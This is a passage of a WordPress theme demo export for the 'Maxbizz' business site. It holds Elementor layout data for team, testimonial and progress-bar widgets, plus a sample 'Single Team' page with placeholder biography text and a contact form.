fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"23f0a2f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"df675fc","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team8.jpg","id":2063},"member_name":"Harry Septem","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"b3c9551","elType":"section","settings":{"layout":"full_width","gap":"no","content_position":"middle","structure":"20"},"elements":[{"id":"cfc4ff2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"background_background":"classic","background_color":"#262832","_inline_size_tablet":100},"elements":[{"id":"6f8488f","elType":"section","settings":{"content_width":{"unit":"px","size":525,"sizes":[]},"css_classes":"mr_0","padding":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"padding_tablet":{"unit":"%","top":"10","right":"20","bottom":"10","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"4e25f9a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"a001cee","elType":"widget","settings":{"sub":"our benefits","title":"Entrust Your Project to  Our Specialists","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"6a5318a","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","text_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0ba065e","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"1df2f14","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"24c3ac5","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"337cb49","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d6d5985","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-team.jpg","id":699},"image_size":"full","_margin_mobile":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a9b5cf2","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"275","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"120","right":"0","bottom":"190","left":"0","isLinked":false}},"elements":[{"id":"4e2afe0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"78c7db3","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e4b3144","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"7e32710","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"5aa0738","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"bf1cbf3","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"d1cccc6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"398c80a","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1940},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1940},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true","dots_spacing":{"unit":"px","size":-50,"sizes":[]},"dots_spacing_tablet":{"unit":"px","size":-40,"sizes":[]}},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"15c47ef","elType":"section","settings":{"content_width":{"unit":"px","size":1340,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"237daa6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7a438e9","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#D92300","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"8bfca9a","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"eadf1a3","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"4b7dca5","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"25c8dd0","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2028]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:6:"column";a:3:{s:5:"count";i:22;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:22;s:19:"_inline_size_tablet";i:18;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:14:"padding_mobile";i:1;s:13:"margin_tablet";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:3;s:5:"title";i:3;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:6:{s:9:"stitle_bg";i:3;s:27:"title_typography_typography";i:3;s:33:"title_typography_font_size_mobile";i:3;s:28:"stitle_typography_typography";i:3;s:27:"stitle_typography_font_size";i:3;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:2;s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:6;}s:14:"section_layout";a:4:{s:6:"layout";i:5;s:3:"gap";i:4;s:13:"content_width";i:2;s:16:"content_position";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:8:{s:7:"padding";i:7;s:14:"padding_mobile";i:5;s:11:"css_classes";i:1;s:14:"padding_tablet";i:2;s:13:"margin_tablet";i:2;s:6:"margin";i:1;s:7:"z_index";i:1;s:13:"margin_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:5:{s:19:"background_position";i:2;s:17:"background_repeat";i:2;s:15:"background_size";i:2;s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:8;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:8;s:11:"member_name";i:7;s:12:"member_extra";i:6;s:12:"social_share";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:4;s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:10:"info_style";a:4:{s:27:"title_typography_typography";i:8;s:26:"title_typography_font_size";i:8;s:25:"job_typography_typography";i:8;s:24:"job_typography_font_size";i:8;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:2:{s:8:"bg_color";i:3;s:10:"lbar_color";i:3;}s:18:"style_text_section";a:2:{s:11:"title_color";i:3;s:6:"per_bg";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:1;s:10:"image_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}s:5:"style";a:1:{s:18:"navigation_section";a:2:{s:12:"dots_spacing";i:1;s:19:"dots_spacing_tablet";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Single Team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-team/single-team/</link>
		<pubDate>Thu, 10 Sep 2020 02:50:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=711</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="530" height="500" src="https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg 530w, https://maxbizz.s3.amazonaws.com/images/image1-single-team-1-300x283.jpg 300w" sizes="(max-width: 530px) 100vw, 530px">
<h3>Peter Perish</h3>
<h6>chief business project</h6>
<ul>
 	<li>Department: Business Department</li>
 	<li>Experience: 15 Years</li>
 	<li>Email: perish.maxbizz@mail.com</li>
 	<li>Phone: +1-800-456-478-23</li>
 	<li>Fax: +1-800-456-478-24</li>
</ul>
<a target="_blank" rel="noopener noreferrer">
Twitter
</a>
<a target="_blank" rel="noopener noreferrer">
Facebook-f
</a>
<a target="_blank" rel="noopener noreferrer">
Google-plus-g
</a>
<a target="_blank" rel="noopener noreferrer">
Pinterest-p
</a>
<h5>My Biography</h5>
A vast majority of the app marketers mainly concentrate on the post-launch app marketing techniques and measures while completely missing on the pre-launch campaign. This prevents the app to create buzz and hype just around the time when the app is launched. As and when you launch the app, already a considerable number of people should expectantly look forward to your app and this requires long-drawn marketing efforts leading up to the app launch event. To create pre-launch buzz and hype about the app a mobile app development company has an array of marketing options like social media campaign, search engine ads, video ads, email campaigns, etc. Apart from online options, you can also reach out to the wider audience with traditional marketing options like outdoor ads, print ads, media ads, and promotional events.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
45
<h6>corporate management</h6>
<h5>My Soft &amp; Hard Skills</h5>
Just as a retail business in real life is remembered not just for its product offerings but also because of its services, support, and customer-friendliness, an app that offers a helpful customer support system for its valued users enjoy more traction and engagement than other apps. Great brands all over the globe enjoy appreciation and popularity because of their customer-friendly support and services.
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-business/wp-admin/admin-ajax.php#wpcf7-f736-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="736">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f736-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<h4>Contact Me</h4>
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">

<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">

<input type="text" name="your-site" value="" size="40" aria-invalid="false" placeholder="Website">

<textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea>

<button type="submit">Send a message</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>711</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 02:50:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 02:50:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[single-team]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.12]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"b501399","elType":"section","settings":{"gap":"extended","padding":{"unit":"px","top":"90","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6365e43","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4b4c82c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","content_position":"middle","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[{"id":"fcac4d4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"98f528e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-single-team.jpg","id":713},"image_size":"full","align":"left","width_tablet":{"unit":"%","size":100,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"1070f44","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"30","bottom":"30","left":"30","isLinked":false}},"elements":[{"id":"bfb6219","elType":"widget","settings":{"title":"Peter Perish","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"77b067d","elType":"widget","settings":{"title":"chief business project","header_size":"h6","title_color":"#D92300","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e4d0805","elType":"widget","settings":{"editor":"<ul class=\"member-info\"><li><span class=\"text-dark\">Department:<\/span> Business Department<\/li><li><span class=\"text-dark\">Experience:<\/span> 15 Years<\/li><li><span class=\"text-dark\">Email: <\/span>perish.maxbizz@mail.com<\/li><li><span class=\"text-dark\">Phone: <\/span>+1-800-456-478-23<\/li><li><span class=\"text-dark\">Fax: <\/span>+1-800-456-478-24<\/li><\/ul>"},"elements":[],"widgetType":"text-editor"},{"id":"1453173","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"columns":"4","align":"left"},"elements":[],"widgetType":"social-icons"}],"isInner":true}],"isInner":true},{"id":"a742530","elType":"widget","settings":{"title":"My Biography","header_size":"h5","_padding":{"unit":"px","top":"60","right":"0","bottom":"25","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"40","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ef6bdc8","elType":"widget","settings":{"editor":"<p>A vast majority of the app marketers mainly concentrate on the post-launch app marketing techniques and measures while completely missing on the pre-launch campaign. This prevents the app to create buzz and hype just around the time when the app is launched. As and when you launch the app, already a considerable number of people should expectantly look forward to your app and this requires long-drawn marketing efforts leading up to the app launch event. To create pre-launch buzz and hype about the app <span style=\"color: #d92300;\">a mobile app development company<\/span> has an array of marketing options like social media campaign, search engine ads, video ads, email campaigns, etc. Apart from online options, you can also reach out to the wider audience with traditional marketing options like outdoor ads, print ads, media ads, and promotional events.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"984c88f","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"865ab3e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7bbffe7","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"da47a10","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"a81434a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"1541169","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ca57b45","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"c75fefb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"bdf3219","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"17353e6","elType":"widget","settings":{"title":"My Soft & Hard Skills","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"318c138","elType":"widget","settings":{"editor":"<p>Just as a retail business in real life is remembered not just for its product offerings but also because of its services, support, and customer-friendliness, an app that offers a helpful customer support system for its valued users enjoy more traction and engagement than other apps. Great brands all over the globe enjoy appreciation and popularity because of their customer-friendly support and 